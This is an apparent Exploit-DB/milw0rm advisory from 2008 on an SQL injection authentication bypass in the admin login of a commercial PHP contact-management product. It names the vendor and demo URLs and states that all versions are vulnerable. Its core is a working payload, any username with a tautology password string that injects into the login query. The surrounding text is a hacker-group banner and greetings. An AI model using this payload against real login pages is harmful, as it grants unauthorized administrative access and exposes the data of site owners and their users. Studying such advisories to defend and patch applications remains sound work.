Rae Media Contact MS - Authentication Bypass

EDB-ID:

7333

Author:

b3hz4d

Type:

webapps

Platform:

PHP

Published:

2008-12-03

        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                         +
        + Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability  +
        +                                                                         +
        +                        Discovered by b3hz4d                             +
        +                                                                         +
        +                        WwW.DeltaHacking.Net                             +
        +                                                                         +
        +                                                                         +
        +                                                                         +
        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 03 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR        : http://www.aliensoftcorp.com/
DEMO          : http://www.aliensoftcorp.com/contactmanager.htm

#####################################################


[+] vuln    : 
              
              Admin login page
              
              All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.
              
              All Demo links are here:
              
              http://www.aliensoftcorp.com/contactmanager.htm	  

[+] Exploit : 
              USER: anything

	      PASS: delta' or 'a'='a
 
                
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# milw0rm.com [2008-12-03]